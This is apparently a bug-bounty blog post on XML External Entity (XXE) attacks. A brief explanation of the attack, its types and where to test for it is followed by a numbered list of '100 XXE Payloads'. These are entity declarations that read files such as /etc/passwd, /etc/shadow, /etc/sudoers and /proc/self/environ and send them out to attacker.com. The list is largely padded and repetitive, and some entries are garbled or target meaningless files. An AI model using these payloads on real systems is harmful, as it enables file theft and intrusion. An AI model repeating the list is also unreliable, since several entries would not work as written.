XXE | Bug Bounty

What is XXE

XXE stands for XML External Entity. It is a type of attack that takes advantage of the XML parser when it processes input. This can allow attackers to access local files, exfiltrate data, make requests to internal resources, and even execute code.

XXE is a particularly dangerous attack because it can be used to bypass access control measures such as authentication and authorization. For example, an attacker may be able to access files on a server without having valid credentials.

To exploit XXE, an attacker crafts a specially crafted XML document that contains an external entity. The XML parser then processes the document and attempts to resolve the external entity. If the entity is not configured properly, the parser will attempt to access a resource or execute code that the attacker has specified.

The most common way to protect against XXE attacks is to properly configure the XML parser to disallow access to external entities. Additionally, it is important to use a secure XML parser that is up to date with the latest security patches.

How and where to find XXE

XXE vulnerabilities can be found in any application that parses XML. Common places to look are web services, mobile applications, and web applications.

To find XXE vulnerabilities, an attacker can use an automated tool such as Burp Suite to scan an application for vulnerable inputs. Additionally, manual testing can be used to send specially crafted XML documents and observe the application’s response.

A good practice is to use an XML validator to make sure that the XML documents being sent are valid and do not contain any malicious code. Additionally, input validation should always be used to prevent malicious inputs from being processed by the XML parser.

Type of XXE

There are three main types of XXE attacks:

1. Local File Disclosure: This type of attack allows an attacker to read sensitive files on the server.

2. Remote File Inclusion: This type of attack allows an attacker to execute code on the server by including a remote file.

3. Server Side Request Forgery: This type of attack allows an attacker to make requests to internal resources on the server.

100 XXE Payloads

1. <!ENTITY % file SYSTEM “file:///etc/passwd”>
2. <!ENTITY % start “<![CDATA[”>
3. <!ENTITY % end “]]>”>
4. <!ENTITY % dtd SYSTEM “http://attacker.com/evil.dtd”>
5. <!ENTITY % all “<!ENTITY send SYSTEM ‘http://attacker.com/?%file;’>”>
6. <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/exfil.php?data=%start;%all;%end;'>">
7. <!ENTITY % start "<![CDATA[" >
8. <!ENTITY % end "]]>" >
9. <!ENTITY % data SYSTEM "file:///dev/random" >
10. <!ENTITY % param1 "<!ENTITY send SYSTEM 'http://attacker.com/exfil.php?data=%start;%data;%end;'>" >
11. <!ENTITY % exfil SYSTEM "http://attacker.com/exfil.php?data=%param1;" >
12. <!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/exfil.php?data=%start;%exfil;%end;'>" >
13. <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd" >
14. <!ENTITY % param2 "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/exfil.php?data=%start;%all;%end;'>" >
15. <!ENTITY % exfil SYSTEM "http://attacker.com/exfil.php?data=%param2;" >
16. <!ENTITY % file SYSTEM "file:///etc/passwd" >
17. <!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/exfil.php?data=%start;%file;%end;'>" >
18. <!ENTITY % param3 "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/exfil.php?data=%start;%all;%end;'>" >
19. <!ENTITY % exfil SYSTEM "http://attacker.com/exfil.php?data=%param3;" >
20. <!ENTITY % start "<![CDATA[" >
21. <!ENTITY % end "]]>" >
22. <!ENTITY % data SYSTEM "file:///dev/urandom" >
23. <!ENTITY % param4 "<!ENTITY send SYSTEM 'http://attacker.com/exfil.php?data=%start;%data;%end;'>" >
24. <!ENTITY % exfil SYSTEM "http://attacker.com/exfil.php?data=%param4;" >
25. <!ENTITY % file SYSTEM "file:///etc/shadow" >
26. <!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/exfil.php?data=%start;%file;%end;'>" >
27. <!ENTITY % param5 "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/exfil.php?data=%start;%all;%end;'>" >
28. <!ENTITY % exfil SYSTEM "http://attacker.com/exfil.php?data=%param5;" >
29. <!ENTITY % start "<![CDATA[" >
30. <!ENTITY % end "]]>" >
31. <!ENTITY % data SYSTEM "file:///proc/self/environ" >
32. <!ENTITY % param6 "<!ENTITY send SYSTEM 'http://attacker.com/exfil.php?data=%start;%data;%end;'>" >
33. <!ENTITY % exfil SYSTEM "http://attacker.com/exfil.php?data=%param6;" >
34. <!ENTITY % file SYSTEM "file:///etc/shadow-" >
35. <!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/exfil.php?data=%start;%file;%end;'>" >
36. <!ENTITY % param7 "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/exfil.php?data=%start;%all;%end;'>" >
37. <!ENTITY % exfil SYSTEM "http://attacker.com/exfil.php?data=%param7;" >
38. <!ENTITY % start "<![CDATA[" >
39. <!ENTITY % end "]]>" >
40. <!ENTITY % data SYSTEM "file:///dev/urandom" >
41. <!ENTITY % param8 "<!ENTITY send SYSTEM 'http://attacker.com/exfil.php?data=%start;%data;%end;'>" >
42. <!ENTITY % exfil SYSTEM "http://attacker.com/exfil.php?data=%param8;" >
43. <!ENTITY % file SYSTEM "file:///etc/crontab" >
44. <!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/exfil.php?data=%start;%file;%end;'>" >
45. <!ENTITY % param9 "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/exfil.php?data=%start;%all;%end;'>" >
46. <!ENTITY % exfil SYSTEM "http://attacker.com/exfil.php?data=%param9;" >
47. <!ENTITY % start "<![CDATA[" >
48. <!ENTITY % end "]]>" >
49. <!ENTITY % data SYSTEM "file:///proc/self/status" >
50. <!ENTITY % param10 "<!ENTITY send SYSTEM 'http://attacker.com/exfil.php?data=%start;%data;%end;'>" >
51. <!ENTITY % exfil SYSTEM "http://attacker.com/exfil.php?data=%param10;" >
52. <!ENTITY % file SYSTEM "file:///etc/hosts" >
53. <!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/exfil.php?data=%start;%file;%end;'>" >
54. <!ENTITY % param11 "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/exfil.php?data=%start;%all;%end;'>" >
55. <!ENTITY % exfil SYSTEM "http://attacker.com/exfil.php?data=%param11;" >
56. <!ENTITY % start "<![CDATA[" >
57. <!ENTITY % end "]]>" >
58. <!ENTITY % data SYSTEM "file:///proc/cpuinfo" >
59. <!ENTITY % param12 "<!ENTITY send SYSTEM 'http://attacker.com/exfil.php?data=%start;%data;%end;'>" >
60. <!ENTITY % exfil SYSTEM "http://attacker.com/exfil.php?data=%param12;" >
61. <!ENTITY % file SYSTEM "file:///etc/fstab" >
62. <!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/exfil.php?data=%start;%file;%end;'>" >
63. <!ENTITY % param13 "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/exfil.php?data=%start;%all;%end;'>" >
64. <!ENTITY % exfil SYSTEM "http://attacker.com/exfil.php?data=%param13;" >
65. <!ENTITY % start "<![CDATA[" >
66. <!ENTITY % end "]]>" >
67. <!ENTITY % data SYSTEM "file:///proc/mounts" >
68. <!ENTITY % param14 "<!ENTITY send SYSTEM 'http://attacker.com/exfil.php?data=%start;%data;%end;'>" >
69. <!ENTITY % exfil SYSTEM "http://attacker.com/exfil.php?data=%param14;" >
70. <!ENTITY % file SYSTEM "file:///etc/group" >
71. <!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/exfil.php?data=%start;%file;%end;'>" >
72. <!ENTITY % param15 "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/exfil.php?data=%start;%all;%end;'>" >
73. <!ENTITY % exfil SYSTEM "http://attacker.com/exfil.php?data=%param15;" >
74. <!ENTITY % start "<![CDATA[" >
75. <!ENTITY % end "]]>" >
76. <!ENTITY % data SYSTEM "file:///proc/loadavg" >
77. <!ENTITY % param16 "<!ENTITY send SYSTEM 'http://attacker.com/exfil.php?data=%start;%data;%end;'>" >
78. <!ENTITY % exfil SYSTEM "http://attacker.com/exfil.php?data=%param16;" >
79. <!ENTITY % file SYSTEM "file:///etc/resolv.conf" >
80. <!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/exfil.php?data=%start;%file;%end;'>" >
81. <!ENTITY % param17 "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/exfil.php?data=%start;%all;%end;'>" >
82. <!ENTITY % exfil SYSTEM "http://attacker.com/exfil.php?data=%param17;" >
83. <!ENTITY % start "<![CDATA[" >
84. <!ENTITY % end "]]>" >
85. <!ENTITY % data SYSTEM "file:///etc/sysctl.conf" >
86. <!ENTITY % param18 "<!ENTITY send SYSTEM 'http://attacker.com/exfil.php?data=%start;%data;%end;'>" >
87. <!ENTITY % exfil SYSTEM "http://attacker.com/exfil.php?data=%param18;" >
88. <!ENTITY % file SYSTEM "file:///etc/ssh/ssh_config" >
89. <!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/exfil.php?data=%start;%file;%end;'>" >
90. <!ENTITY % param19 "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/exfil.php?data=%start;%all;%end;'>" >
91. <!ENTITY % exfil SYSTEM "http://attacker.com/exfil.php?data=%param19;" >
92. <!ENTITY % start "<![CDATA[" >
93. <!ENTITY % end "]]>" >
94. <!ENTITY % data SYSTEM "file:///etc/profile" >
95. <!ENTITY % param20 "<!ENTITY send SYSTEM 'http://attacker.com/exfil.php?data=%start;%data;%end;'>" >
96. <!ENTITY % exfil SYSTEM "http://attacker.com/exfil.php?data=%param20;" >
97. <!ENTITY % file SYSTEM "file:///etc/sudoers" >
98. <!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/exfil.php?data=%start;%file;%end;'>" >
99. <!ENTITY % param21 "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/exfil.php?data=%start;%all;%end;'>" >
100. <!ENTITY % exfil SYSTEM "http://attacker.com/exfil.php?data=%param21;" >
Tags: , , , , , ,

Leave a Reply